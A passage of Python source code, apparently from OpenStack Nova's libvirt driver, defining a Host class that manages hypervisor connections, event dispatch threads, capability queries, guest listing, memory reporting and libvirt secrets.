the raw libvirt API. These APIs are then used by all
the other libvirt related classes
"""
from collections import defaultdict
import inspect
import operator
import os
import socket
import threading
from eventlet import greenio
from eventlet import greenthread
from eventlet import patcher
from eventlet import tpool
from oslo_log import log as logging
from oslo_utils import encodeutils
from oslo_utils import excutils
from oslo_utils import importutils
from oslo_utils import units
from oslo_utils import versionutils
import six
from nova.compute import utils as compute_utils
import nova.conf
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova import rpc
from nova import utils
from nova.virt import event as virtevent
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import guest as libvirt_guest
from nova.virt.libvirt import migration as libvirt_migrate
from nova.virt.libvirt import utils as libvirt_utils
libvirt = None
LOG = logging.getLogger(__name__)
native_socket = patcher.original('socket')
native_threading = patcher.original("threading")
native_Queue = patcher.original("Queue" if six.PY2 else "queue")
CONF = nova.conf.CONF
# This list is for libvirt hypervisor drivers that need special handling.
# This is *not* the complete list of supported hypervisor drivers.
HV_DRIVER_QEMU = "QEMU"
HV_DRIVER_XEN = "Xen"
SEV_KERNEL_PARAM_FILE = '/sys/module/kvm_amd/parameters/sev'
class Host(object):
def __init__(self, uri, read_only=False,
conn_event_handler=None,
lifecycle_event_handler=None):
global libvirt
if libvirt is None:
libvirt = importutils.import_module('libvirt')
self._uri = uri
self._read_only = read_only
self._initial_connection = True
self._conn_event_handler = conn_event_handler
self._conn_event_handler_queue = six.moves.queue.Queue()
self._lifecycle_event_handler = lifecycle_event_handler
self._caps = None
self._domain_caps = None
self._hostname = None
self._wrapped_conn = None
self._wrapped_conn_lock = threading.Lock()
self._event_queue = None
self._events_delayed = {}
# Note(toabctl): During a reboot of a domain, STOPPED and
# STARTED events are sent. To prevent shutting
# down the domain during a reboot, delay the
# STOPPED lifecycle event some seconds.
self._lifecycle_delay = 15
self._initialized = False
self._libvirt_proxy_classes = self._get_libvirt_proxy_classes(libvirt)
self._libvirt_proxy = self._wrap_libvirt_proxy(libvirt)
# AMD SEV is conditional on support in the hardware, kernel,
# qemu, and libvirt. This is determined on demand and
# memoized by the supports_amd_sev property below.
self._supports_amd_sev = None
self._has_hyperthreading = None
@staticmethod
def _get_libvirt_proxy_classes(libvirt_module):
"""Return a tuple for tpool.Proxy's autowrap argument containing all
classes defined by the libvirt module except libvirtError.
"""
# Get a list of (name, class) tuples of libvirt classes
classes = inspect.getmembers(libvirt_module, inspect.isclass)
# Return a list of just the classes, filtering out libvirtError because
# we don't need to proxy that
return tuple([cls[1] for cls in classes if cls[0] != 'libvirtError'])
def _wrap_libvirt_proxy(self, obj):
"""Return an object wrapped in a tpool.Proxy using autowrap appropriate
for the libvirt module.
"""
# libvirt is not pure python, so eventlet monkey patching doesn't work
# on it. Consequently long-running libvirt calls will not yield to
# eventlet's event loop, starving all other greenthreads until
# completion. eventlet's tpool.Proxy handles this situation for us by
# executing proxied calls in a native thread.
return tpool.Proxy(obj, autowrap=self._libvirt_proxy_classes)
def _native_thread(self):
"""Receives async events coming in from libvirtd.
This is a native thread which runs the default
libvirt event loop implementation. This processes
any incoming async events from libvirtd and queues
them for later dispatch. This thread is only
permitted to use libvirt python APIs, and the
driver.queue_event method. In particular any use
of logging is forbidden, since it will confuse
eventlet's greenthread integration
"""
while True:
libvirt.virEventRunDefaultImpl()
def _dispatch_thread(self):
"""Dispatches async events coming in from libvirtd.
This is a green thread which waits for events to
arrive from the libvirt event loop thread. This
then dispatches the events to the compute manager.
"""
while True:
self._dispatch_events()
def _conn_event_thread(self):
"""Dispatches async connection events"""
# NOTE(mdbooth): This thread doesn't need to jump through the same
# hoops as _dispatch_thread because it doesn't interact directly
# with the libvirt native thread.
while True:
self._dispatch_conn_event()
def _dispatch_conn_event(self):
# NOTE(mdbooth): Splitting out this loop looks redundant, but it
# means we can easily dispatch events synchronously from tests and
# it isn't completely awful.
handler = self._conn_event_handler_queue.get()
try:
handler()
except Exception:
LOG.exception('Exception handling connection event')
finally:
self._conn_event_handler_queue.task_done()
@staticmethod
def _event_lifecycle_callback(conn, dom, event, detail, opaque):
"""Receives lifecycle events from libvirt.
NB: this method is executing in a native thread, not
an eventlet coroutine. It can only invoke other libvirt
APIs, or use self._queue_event(). Any use of logging APIs
in particular is forbidden.
"""
self = opaque
uuid = dom.UUIDString()
transition = None
if event == libvirt.VIR_DOMAIN_EVENT_STOPPED:
transition = virtevent.EVENT_LIFECYCLE_STOPPED
elif event == libvirt.VIR_DOMAIN_EVENT_STARTED:
transition = virtevent.EVENT_LIFECYCLE_STARTED
elif event == libvirt.VIR_DOMAIN_EVENT_SUSPENDED:
if detail == libvirt.VIR_DOMAIN_EVENT_SUSPENDED_POSTCOPY:
transition = virtevent.EVENT_LIFECYCLE_POSTCOPY_STARTED
elif detail == libvirt.VIR_DOMAIN_EVENT_SUSPENDED_MIGRATED:
# VIR_DOMAIN_EVENT_SUSPENDED_MIGRATED is also sent when live
# migration of the guest fails, so we cannot simply rely
# on the event itself but need to check if the job itself was
# successful.
# NOTE(mriedem): The job check logic here is copied from
# LibvirtDriver._live_migration_monitor.
guest = libvirt_guest.Guest(dom)
info = guest.get_job_info()
if info.type == libvirt.VIR_DOMAIN_JOB_NONE:
# Either still running, or failed or completed,
# lets untangle the mess.
info.type = libvirt_migrate.find_job_type(
guest, instance=None, logging_ok=False)
if info.type == libvirt.VIR_DOMAIN_JOB_COMPLETED:
transition = virtevent.EVENT_LIFECYCLE_MIGRATION_COMPLETED
else:
# Failed or some other status we don't know about, so just
# opt to report the guest is paused.
transition = virtevent.EVENT_LIFECYCLE_PAUSED
else:
transition = virtevent.EVENT_LIFECYCLE_PAUSED
elif event == libvirt.VIR_DOMAIN_EVENT_RESUMED:
transition = virtevent.EVENT_LIFECYCLE_RESUMED
if transition is not None:
self._queue_event(virtevent.LifecycleEvent(uuid, transition))
def _close_callback(self, conn, reason, opaque):
close_info = {'conn': conn, 'reason': reason}
self._queue_event(close_info)
@staticmethod
def _test_connection(conn):
try:
conn.getLibVersion()
return True
except libvirt.libvirtError as e:
if (e.get_error_code() in (libvirt.VIR_ERR_SYSTEM_ERROR,
libvirt.VIR_ERR_INTERNAL_ERROR) and
e.get_error_domain() in (libvirt.VIR_FROM_REMOTE,
libvirt.VIR_FROM_RPC)):
LOG.debug('Connection to libvirt broke')
return False
raise
@staticmethod
def _connect_auth_cb(creds, opaque):
if len(creds) == 0:
return 0
raise exception.InternalError(
_("Can not handle authentication request for %d credentials")
% len(creds))
def _connect(self, uri, read_only):
auth = [[libvirt.VIR_CRED_AUTHNAME,
libvirt.VIR_CRED_ECHOPROMPT,
libvirt.VIR_CRED_REALM,
libvirt.VIR_CRED_PASSPHRASE,
libvirt.VIR_CRED_NOECHOPROMPT,
libvirt.VIR_CRED_EXTERNAL],
Host._connect_auth_cb,
None]
flags = 0
if read_only:
flags = libvirt.VIR_CONNECT_RO
return self._libvirt_proxy.openAuth(uri, auth, flags)
def _queue_event(self, event):
"""Puts an event on the queue for dispatch.
This method is called by the native event thread to
put events on the queue for later dispatch by the
green thread. Any use of logging APIs is forbidden.
"""
if self._event_queue is None:
return
# Queue the event...
self._event_queue.put(event)
# ...then wakeup the green thread to dispatch it
c = ' '.encode()
self._event_notify_send.write(c)
self._event_notify_send.flush()
def _dispatch_events(self):
"""Wait for & dispatch events from native thread
Blocks until native thread indicates some events
are ready. Then dispatches all queued events.
"""
# Wait to be notified that there are some
# events pending
try:
_c = self._event_notify_recv.read(1)
assert _c
except ValueError:
return # will be raised when pipe is closed
# Process as many events as possible without
# blocking
last_close_event = None
while not self._event_queue.empty():
try:
event = self._event_queue.get(block=False)
if isinstance(event, virtevent.LifecycleEvent):
# call possibly with delay
self._event_emit_delayed(event)
elif 'conn' in event and 'reason' in event:
last_close_event = event
except native_Queue.Empty:
pass
if last_close_event is None:
return
conn = last_close_event['conn']
# get_new_connection may already have disabled the host,
# in which case _wrapped_conn is None.
with self._wrapped_conn_lock:
if conn == self._wrapped_conn:
reason = str(last_close_event['reason'])
msg = _("Connection to libvirt lost: %s") % reason
self._wrapped_conn = None
self._queue_conn_event_handler(False, msg)
def _event_emit_delayed(self, event):
"""Emit events - possibly delayed."""
def event_cleanup(gt, *args, **kwargs):
"""Callback function for greenthread. Called
to cleanup the _events_delayed dictionary when an event
was called.
"""
event = args[0]
self._events_delayed.pop(event.uuid, None)
# Cleanup possible delayed stop events.
if event.uuid in self._events_delayed.keys():
self._events_delayed[event.uuid].cancel()
self._events_delayed.pop(event.uuid, None)
LOG.debug("Removed pending event for %s due to "
"lifecycle event", event.uuid)
if event.transition == virtevent.EVENT_LIFECYCLE_STOPPED:
# Delay STOPPED event, as they may be followed by a STARTED
# event in case the instance is rebooting
id_ = greenthread.spawn_after(self._lifecycle_delay,
self._event_emit, event)
self._events_delayed[event.uuid] = id_
# add callback to cleanup self._events_delayed dict after
# event was called
id_.link(event_cleanup, event)
else:
self._event_emit(event)
def _event_emit(self, event):
if self._lifecycle_event_handler is not None:
self._lifecycle_event_handler(event)
def _init_events_pipe(self):
"""Create a self-pipe for the native thread to synchronize on.
This code is taken from the eventlet tpool module, under terms
of the Apache License v2.0.
"""
self._event_queue = native_Queue.Queue()
try:
rpipe, wpipe = os.pipe()
self._event_notify_send = greenio.GreenPipe(wpipe, 'wb', 0)
self._event_notify_recv = greenio.GreenPipe(rpipe, 'rb', 0)
except (ImportError, NotImplementedError):
# This is Windows compatibility -- use a socket instead
# of a pipe because pipes don't really exist on Windows.
sock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', 0))
sock.listen(50)
csock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
csock.connect(('localhost', sock.getsockname()[1]))
nsock, addr = sock.accept()
self._event_notify_send = nsock.makefile('wb', 0)
gsock = greenio.GreenSocket(csock)
self._event_notify_recv = gsock.makefile('rb', 0)
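    # NOTE: _queue_event() and _dispatch_events() cooperate through the classic
    # "self-pipe" wakeup pattern set up above. A minimal standalone sketch of
    # that pattern (hypothetical names, not part of this class) would be:
    #
    #   import os, queue
    #   events, (r, w) = queue.Queue(), os.pipe()
    #
    #   def producer(evt):        # native thread side
    #       events.put(evt)
    #       os.write(w, b' ')     # wake up the dispatcher
    #
    #   def consumer(handle):     # dispatch thread side
    #       os.read(r, 1)         # block until woken
    #       while not events.empty():
    #           handle(events.get(block=False))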
def _init_events(self):
"""Initializes the libvirt events subsystem.
This requires running a native thread to provide the
libvirt event loop integration. This forwards events
to a green thread which does the actual dispatching.
"""
self._init_events_pipe()
LOG.debug("Starting native event thread")
self._event_thread = native_threading.Thread(
target=self._native_thread)
self._event_thread.setDaemon(True)
self._event_thread.start()
LOG.debug("Starting green dispatch thread")
utils.spawn(self._dispatch_thread)
def _get_new_connection(self):
# call with _wrapped_conn_lock held
LOG.debug('Connecting to libvirt: %s', self._uri)
# This will raise an exception on failure
wrapped_conn = self._connect(self._uri, self._read_only)
try:
LOG.debug("Registering for lifecycle events %s", self)
wrapped_conn.domainEventRegisterAny(
None,
libvirt.VIR_DOMAIN_EVENT_ID_LIFECYCLE,
self._event_lifecycle_callback,
self)
except Exception as e:
LOG.warning("URI %(uri)s does not support events: %(error)s",
{'uri': self._uri, 'error': e})
try:
LOG.debug("Registering for connection events: %s", str(self))
wrapped_conn.registerCloseCallback(self._close_callback, None)
except libvirt.libvirtError as e:
LOG.warning("URI %(uri)s does not support connection"
" events: %(error)s",
{'uri': self._uri, 'error': e})
return wrapped_conn
def _queue_conn_event_handler(self, *args, **kwargs):
if self._conn_event_handler is None:
return
def handler():
return self._conn_event_handler(*args, **kwargs)
self._conn_event_handler_queue.put(handler)
def _get_connection(self):
# multiple concurrent connections are protected by _wrapped_conn_lock
with self._wrapped_conn_lock:
# Drop the existing connection if it is not usable
if (self._wrapped_conn is not None and
not self._test_connection(self._wrapped_conn)):
self._wrapped_conn = None
# Connection was previously up, and went down
self._queue_conn_event_handler(
False, _('Connection to libvirt lost'))
if self._wrapped_conn is None:
try:
# This will raise if it fails to get a connection
self._wrapped_conn = self._get_new_connection()
except Exception as ex:
with excutils.save_and_reraise_exception():
# If we previously had a connection and it went down,
# we generated a down event for that above.
# We also want to generate a down event for an initial
# failure, which won't be handled above.
if self._initial_connection:
self._queue_conn_event_handler(
False,
_('Failed to connect to libvirt: %(msg)s') %
{'msg': ex})
finally:
self._initial_connection = False
self._queue_conn_event_handler(True, None)
return self._wrapped_conn
def get_connection(self):
"""Returns a connection to the hypervisor
This method should be used to create and return a well
configured connection to the hypervisor.
:returns: a libvirt.virConnect object
"""
try:
conn = self._get_connection()
except libvirt.libvirtError as ex:
LOG.exception("Connection to libvirt failed: %s", ex)
payload = {'ip': CONF.my_ip, 'method': '_connect', 'reason': ex}
ctxt = nova_context.get_admin_context()
rpc.get_notifier('compute').error(ctxt,
'compute.libvirt.error',
payload)
compute_utils.notify_about_libvirt_connect_error(
ctxt, ip=CONF.my_ip, exception=ex)
raise exception.HypervisorUnavailable(host=CONF.host)
return conn
@staticmethod
def _libvirt_error_handler(context, err):
# Just ignore instead of default outputting to stderr.
pass
def initialize(self):
if self._initialized:
return
# NOTE(dkliban): Error handler needs to be registered before libvirt
# connection is used for the first time. Otherwise, the
# handler does not get registered.
libvirt.registerErrorHandler(self._libvirt_error_handler, None)
libvirt.virEventRegisterDefaultImpl()
self._init_events()
LOG.debug("Starting connection event dispatch thread")
utils.spawn(self._conn_event_thread)
self._initialized = True
def _version_check(self, lv_ver=None, hv_ver=None, hv_type=None,
op=operator.lt):
"""Check libvirt version, hypervisor version, and hypervisor type
:param hv_type: hypervisor driver from the top of this file.
"""
conn = self.get_connection()
try:
if lv_ver is not None:
libvirt_version = conn.getLibVersion()
if op(libvirt_version,
versionutils.convert_version_to_int(lv_ver)):
return False
if hv_ver is not None:
hypervisor_version = conn.getVersion()
if op(hypervisor_version,
versionutils.convert_version_to_int(hv_ver)):
return False
if hv_type is not None:
hypervisor_type = conn.getType()
if hypervisor_type != hv_type:
return False
return True
except Exception:
return False
def has_min_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.lt)
def has_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.ne)
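    # Illustrative use of the two helpers above (the version tuples are
    # hypothetical examples, not minima required by this module):
    #
    #   if host.has_min_version(lv_ver=(4, 0, 0), hv_ver=(2, 11, 0),
    #                           hv_type='QEMU'):
    #       ...enable a feature that needs at least those versions...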
def get_guest(self, instance):
"""Retrieve libvirt guest object for an instance.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
:param instance: a nova.objects.Instance object
:returns: a nova.virt.libvirt.Guest object
:raises exception.InstanceNotFound: The domain was not found
:raises exception.InternalError: A libvirt error occurred
"""
return libvirt_guest.Guest(self._get_domain(instance))
def _get_domain(self, instance):
"""Retrieve libvirt domain object for an instance.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
:param instance: a nova.objects.Instance object
:returns: a libvirt.Domain object
:raises exception.InstanceNotFound: The domain was not found
:raises exception.InternalError: A libvirt error occurred
"""
try:
conn = self.get_connection()
return conn.lookupByUUIDString(instance.uuid)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance.uuid)
msg = (_('Error from libvirt while looking up %(instance_name)s: '
'[Error Code %(error_code)s] %(ex)s') %
{'instance_name': instance.name,
'error_code': error_code,
'ex': ex})
raise exception.InternalError(msg)
def list_guests(self, only_running=True, only_guests=True):
"""Get a list of Guest objects for nova instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
See method "list_instance_domains" for more information.
:returns: list of Guest objects
"""
return [libvirt_guest.Guest(dom) for dom in self.list_instance_domains(
only_running=only_running, only_guests=only_guests)]
def list_instance_domains(self, only_running=True, only_guests=True):
"""Get a list of libvirt.Domain objects for nova instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
Query libvirt to a get a list of all libvirt.Domain objects
that correspond to nova instances. If the only_running parameter
is true this list will only include active domains, otherwise
inactive domains will be included too. If the only_guests parameter
is true the list will have any "host" domain (aka Xen Domain-0)
filtered out.
:returns: list of libvirt.Domain objects
"""
flags = libvirt.VIR_CONNECT_LIST_DOMAINS_ACTIVE
if not only_running:
flags = flags | libvirt.VIR_CONNECT_LIST_DOMAINS_INACTIVE
# listAllDomains() returns <list of virDomain>, not <virDomain>, so
# tpool.Proxy's autowrap won't catch it. We need to wrap the
# contents of the list we return.
alldoms = (self._wrap_libvirt_proxy(dom)
for dom in self.get_connection().listAllDomains(flags))
doms = []
for dom in alldoms:
if only_guests and dom.ID() == 0:
continue
doms.append(dom)
return doms
def get_online_cpus(self):
"""Get the set of CPUs that are online on the host
:returns: set of online CPUs, raises libvirtError on error
"""
cpus, cpu_map, online = self.get_connection().getCPUMap()
online_cpus = set()
for cpu in range(cpus):
if cpu_map[cpu]:
online_cpus.add(cpu)
return online_cpus
def get_cpu_model_names(self):
"""Get the cpu models based on host CPU arch
:returns: a list of cpu models which supported by the given CPU arch
"""
arch = self.get_capabilities().host.cpu.arch
return self.get_connection().getCPUModelNames(arch)
@staticmethod
def _log_host_capabilities(xmlstr):
# NOTE(mriedem): This looks a bit weird but we do this so we can stub
# out this method in unit/functional test runs since the xml string is
# big and it can cause subunit parsing to fail (see bug 1813147).
LOG.info("Libvirt host capabilities %s", xmlstr)
def get_capabilities(self):
"""Returns the host capabilities information
Returns an instance of config.LibvirtConfigCaps representing
the capabilities of the host.
Note: The result is cached in the member attribute _caps.
:returns: a config.LibvirtConfigCaps object
"""
if not self._caps:
xmlstr = self.get_connection().getCapabilities()
self._log_host_capabilities(xmlstr)
self._caps = vconfig.LibvirtConfigCaps()
self._caps.parse_str(xmlstr)
# NOTE(mriedem): Don't attempt to get baseline CPU features
# if libvirt can't determine the host cpu model.
if (hasattr(libvirt,
'VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES') and
self._caps.host.cpu.model is not None):
try:
xml_str = self._caps.host.cpu.to_xml()
if six.PY3 and isinstance(xml_str, six.binary_type):
xml_str = xml_str.decode('utf-8')
features = self.get_connection().baselineCPU(
[xml_str],
libvirt.VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES)
if features:
cpu = vconfig.LibvirtConfigCPU()
cpu.parse_str(features)
self._caps.host.cpu.features = cpu.features
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
LOG.warning("URI %(uri)s does not support full set"
" of host capabilities: %(error)s",
{'uri': self._uri, 'error': ex})
else:
raise
return self._caps
def get_domain_capabilities(self):
"""Returns the capabilities you can request when creating a
domain (VM) with that hypervisor, for various combinations of
architecture and machine type.
In this context the fuzzy word "hypervisor" implies QEMU
binary, libvirt itself and the host config. libvirt provides
this in order that callers can determine what the underlying
emulator and/or libvirt is capable of, prior to creating a domain
(for instance via virDomainCreateXML or virDomainDefineXML).
However nova needs to know the capabilities much earlier, when
the host's compute service is first initialised, in order that
placement decisions can be made across many compute hosts.
Therefore this is expected to be called during the init_host()
phase of the driver lifecycle rather than just before booting
an instance.
This causes an additional complication since the Python
binding for this libvirt API call requires the architecture
and machine type to be provided. So in order to gain a full
picture of the hypervisor's capabilities, technically we need
to call it with the right parameters, once for each
(architecture, machine_type) combination which we care about.
However the libvirt experts have advised us that in practice
the domain capabilities do not (yet, at least) vary enough
across machine types to justify the cost of calling
getDomainCapabilities() once for every single (architecture,
machine_type) combination. In particular, SEV support isn't
reported per-machine type, and since there are usually many
machine types, we heed the advice of the experts that it's
typically sufficient to call it once per host architecture:
https://bugzilla.redhat.com/show_bug.cgi?id=1683471#c7
However, that's not quite sufficient in the context of nova,
because SEV guests typically require a q35 machine type, as do
KVM/QEMU guests that want Secure Boot, whereas the current
default machine type for x86_64 is 'pc'. So we need results
from the getDomainCapabilities API for at least those two.
Fortunately we can take advantage of the results from the
getCapabilities API which marks selected machine types as
canonical, e.g.:
<machine canonical='pc-i440fx-2.11' maxCpus='255'>pc</machine>
<machine canonical='pc-q35-2.11' maxCpus='288'>q35</machine>
So for now, we call getDomainCapabilities for these canonical
machine types of each architecture, plus for the
architecture's default machine type, if that is not one of the
canonical types.
Future domain capabilities might report SEV in a more
fine-grained manner, and we also expect to use this method to
detect other features, such as for gracefully handling machine
types and potentially for detecting OVMF binaries. Therefore
we memoize the results of the API calls in a nested dict where
the top-level keys are architectures, and second-level keys
are machine types, in order to allow easy expansion later.
Whenever libvirt/QEMU are updated, cached domCapabilities
would get outdated (because QEMU will contain new features and
the capabilities will vary). However, this should not be a
problem here, because when libvirt/QEMU gets updated, the
nova-compute agent also needs restarting, at which point the
memoization will vanish because it's not persisted to disk.
Note: The result is cached in the member attribute
_domain_caps.
:returns: a nested dict of dicts which maps architectures to
machine types to instances of config.LibvirtConfigDomainCaps
representing the domain capabilities of the host for that arch
and machine type:
{ arch:
{ machine_type: LibvirtConfigDomainCaps }
}
"""
if self._domain_caps:
return self._domain_caps
domain_caps = defaultdict(dict)
caps = self.get_capabilities()
virt_type = CONF.libvirt.virt_type
for guest in caps.guests:
arch = guest.arch
domain = guest.domains.get(virt_type, guest.default_domain)
for machine_type in self._get_machine_types(arch, domain):
# It is expected that if there are multiple <guest>
# elements, each will have a different architecture;
# for example, on x86 hosts one <guest> will contain
# <arch name='i686'> and one will contain <arch
# name='x86_64'>. But it doesn't hurt to add a safety
# net to avoid needlessly calling libvirt's API more
# times than we need.
if machine_type and machine_type in domain_caps[arch]:
continue
self._add_to_domain_capabilities(domain.emulator, arch,
domain_caps, machine_type,
virt_type)
# NOTE(aspiers): Use a temporary variable to update the
# instance variable atomically, otherwise if some API
# calls succeeded and then one failed, we might
# accidentally memoize a partial result.
self._domain_caps = domain_caps
return self._domain_caps
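    # Sketch of consuming the nested dict returned above (the arch and machine
    # type keys are illustrative; actual keys depend on the host):
    #
    #   caps = host.get_domain_capabilities()
    #   for arch, by_machine_type in caps.items():
    #       for machine_type, dom_caps in by_machine_type.items():
    #           # dom_caps is a vconfig.LibvirtConfigDomainCaps instance
    #           print(arch, machine_type, dom_caps.machine_type)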
def _get_machine_types(self, arch, domain):
"""Get the machine types for this architecture for which we need to
call getDomainCapabilities, i.e. the canonical machine types,
and the default machine type (if it's not one of the canonical
machine types).
See the docstring for get_domain_capabilities() for an explanation
of why we choose this set of machine types.
"""
# NOTE(aspiers): machine_type could be None here if nova
# doesn't have a default machine type for this architecture.
# See _add_to_domain_capabilities() below for how this is handled.
mtypes = set([libvirt_utils.get_default_machine_type(arch)])
mtypes.update(domain.aliases.keys())
LOG.debug("Getting domain capabilities for %(arch)s via "
"machine types: %(mtypes)s",
{'arch': arch, 'mtypes': mtypes})
return mtypes
def _add_to_domain_capabilities(self, emulator_bin, arch, domain_caps,
machine_type, virt_type):
# NOTE(aspiers): machine_type could be None here if nova
# doesn't have a default machine type for this architecture.
# In that case we pass a machine_type of None to the libvirt
# API and rely on it choosing a sensible default which will be
# returned in the <machine> element. It could also be an
# alias like 'pc' rather than a full machine type.
#
# NOTE(kchamart): Prior to libvirt v4.7.0 libvirt picked its
# default machine type for x86, 'pc', as reported by QEMU's
# default. From libvirt v4.7.0 onwards, libvirt _explicitly_
# declared the "preferred" default for x86 as 'pc' (and
# appropriate values for other architectures), and only uses
# QEMU's reported default (whatever that may be) if 'pc' does
# not exist. This was done "to isolate applications from
# hypervisor changes that may cause incompatibilities" --
# i.e. if, or when, QEMU changes its default machine type to
# something else. Refer to this libvirt commit:
#
# https://libvirt.org/git/?p=libvirt.git;a=commit;h=26cfb1a3
try:
cap_obj = self._get_domain_capabilities(
emulator_bin=emulator_bin, arch=arch,
machine_type=machine_type, virt_type=virt_type)
except libvirt.libvirtError as ex:
# NOTE(sean-k-mooney): This can happen for several
# reasons, but one common example is if you have
# multiple QEMU emulators installed and you set
# virt-type=kvm. In this case any non-native emulator,
# e.g. AArch64 on an x86 host, will (correctly) raise
# an exception as KVM cannot be used to accelerate CPU
# instructions for non-native architectures.
error_code = ex.get_error_code()
LOG.debug(
"Error from libvirt when retrieving domain capabilities "
"for arch %(arch)s / virt_type %(virt_type)s / "
"machine_type %(mach_type)s: "
"[Error Code %(error_code)s]: %(exception)s",
{'arch': arch, 'virt_type': virt_type,
'mach_type': machine_type, 'error_code': error_code,
'exception': ex})
# Remove archs added by default dict lookup when checking
            # if the machine type has already been recorded.
if arch in domain_caps:
domain_caps.pop(arch)
return
# Register the domain caps using the expanded form of
# machine type returned by libvirt in the <machine>
# element (e.g. pc-i440fx-2.11)
if cap_obj.machine_type:
domain_caps[arch][cap_obj.machine_type] = cap_obj
else:
# NOTE(aspiers): In theory this should never happen,
# but better safe than sorry.
LOG.warning(
"libvirt getDomainCapabilities("
"emulator_bin=%(emulator_bin)s, arch=%(arch)s, "
"machine_type=%(machine_type)s, virt_type=%(virt_type)s) "
"returned null <machine> type",
{'emulator_bin': emulator_bin, 'arch': arch,
'machine_type': machine_type, 'virt_type': virt_type}
)
# And if we passed an alias, register the domain caps
# under that too.
if machine_type and machine_type != cap_obj.machine_type:
domain_caps[arch][machine_type] = cap_obj
cap_obj.machine_type_alias = machine_type
def _get_domain_capabilities(self, emulator_bin=None, arch=None,
machine_type=None, virt_type=None, flags=0):
xmlstr = self.get_connection().getDomainCapabilities(
emulator_bin,
arch,
machine_type,
virt_type,
flags
)
LOG.debug("Libvirt host hypervisor capabilities for arch=%s and "
"machine_type=%s:\n%s", arch, machine_type, xmlstr)
caps = vconfig.LibvirtConfigDomainCaps()
caps.parse_str(xmlstr)
return caps
def get_driver_type(self):
"""Get hypervisor type.
:returns: hypervisor type (ex. qemu)
"""
return self.get_connection().getType()
def get_version(self):
"""Get hypervisor version.
:returns: hypervisor version (ex. 12003)
"""
return self.get_connection().getVersion()
def get_hostname(self):
"""Returns the hostname of the hypervisor."""
hostname = self.get_connection().getHostname()
if self._hostname is None:
self._hostname = hostname
elif hostname != self._hostname:
LOG.error('Hostname has changed from %(old)s '
'to %(new)s. A restart is required to take effect.',
{'old': self._hostname, 'new': hostname})
return self._hostname
def find_secret(self, usage_type, usage_id):
"""Find a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
usage_id: name of resource in secret
"""
if usage_type == 'iscsi':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_ISCSI
elif usage_type in ('rbd', 'ceph'):
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_CEPH
elif usage_type == 'volume':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_VOLUME
else:
msg = _("Invalid usage_type: %s")
raise exception.InternalError(msg % usage_type)
try:
conn = self.get_connection()
return conn.secretLookupByUsage(usage_type_const, usage_id)
except libvirt.libvirtError as e:
if e.get_error_code() == libvirt.VIR_ERR_NO_SECRET:
return None
def create_secret(self, usage_type, usage_id, password=None, uuid=None):
"""Create a secret.
:param usage_type: one of 'iscsi', 'ceph', 'rbd', 'volume', 'vtpm'.
'rbd' will be converted to 'ceph'. 'vtpm' secrets
are private and ephemeral; others are not.
:param usage_id: name of resource in secret
:param password: optional secret value to set
:param uuid: optional UUID of the secret; else one is generated by
libvirt
"""
secret_conf = vconfig.LibvirtConfigSecret()
secret_conf.ephemeral = usage_type == 'vtpm'
secret_conf.private = usage_type == 'vtpm'
secret_conf.usage_id = usage_id
secret_conf.uuid = uuid
if usage_type in ('rbd', 'ceph'):
secret_conf.usage_type = 'ceph'
elif usage_type == 'iscsi':
secret_conf.usage_type = 'iscsi'
elif usage_type == 'volume':
secret_conf.usage_type = 'volume'
elif usage_type == 'vtpm':
secret_conf.usage_type = 'vtpm'
else:
msg = _("Invalid usage_type: %s")
raise exception.InternalError(msg % usage_type)
xml = secret_conf.to_xml()
try:
LOG.debug('Secret XML: %s', xml)
conn = self.get_connection()
secret = conn.secretDefineXML(xml)
if password is not None:
secret.setValue(password)
return secret
except libvirt.libvirtError:
with excutils.save_and_reraise_exception():
LOG.error('Error defining a secret with XML: %s', xml)
def delete_secret(self, usage_type, usage_id):
"""Delete a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
usage_id: name of resource in secret
"""
secret = self.find_secret(usage_type, usage_id)
if secret is not None:
secret.undefine()
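    # Illustrative secret lifecycle for a Ceph-backed volume (the usage_id and
    # key variable below are hypothetical):
    #
    #   secret = host.create_secret('rbd', 'client.cinder secret',
    #                               password=rbd_auth_key)
    #   # ...build the disk XML referencing secret.UUIDString()...
    #   host.delete_secret('rbd', 'client.cinder secret')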
def _get_hardware_info(self):
"""Returns hardware information about the Node.
Note that the memory size is reported in MiB instead of KiB.
"""
return self.get_connection().getInfo()
def get_memory_mb_total(self):
"""Get the total memory size(MB) of physical computer.
:returns: the total amount of memory(MB).
"""
if CONF.libvirt.file_backed_memory > 0:
return CONF.libvirt.file_backed_memory
else:
return self._get_hardware_info()[1]
def _sum_domain_memory_mb(self, include_host=True):
"""Get the total memory consumed by guest domains
        If include_host is True, subtract the available host memory from
        guest 0 to get the real memory used by dom0 under Xen.
"""
used = 0
for guest in self.list_guests(only_guests=False):
try:
# TODO(sahid): Use get_info...
dom_mem = int(guest._get_domain_info()[2])
except libvirt.libvirtError as e:
LOG.warning("couldn't obtain the memory from domain:"
" %(uuid)s, exception: %(ex)s",
{"uuid": guest.uuid, "ex": e})
continue
if include_host and guest.id == 0:
# Memory usage for the host domain (dom0 in xen) is the
# reported memory minus available memory
used += (dom_mem - self._get_avail_memory_kb())
else:
used += dom_mem
# Convert it to MB
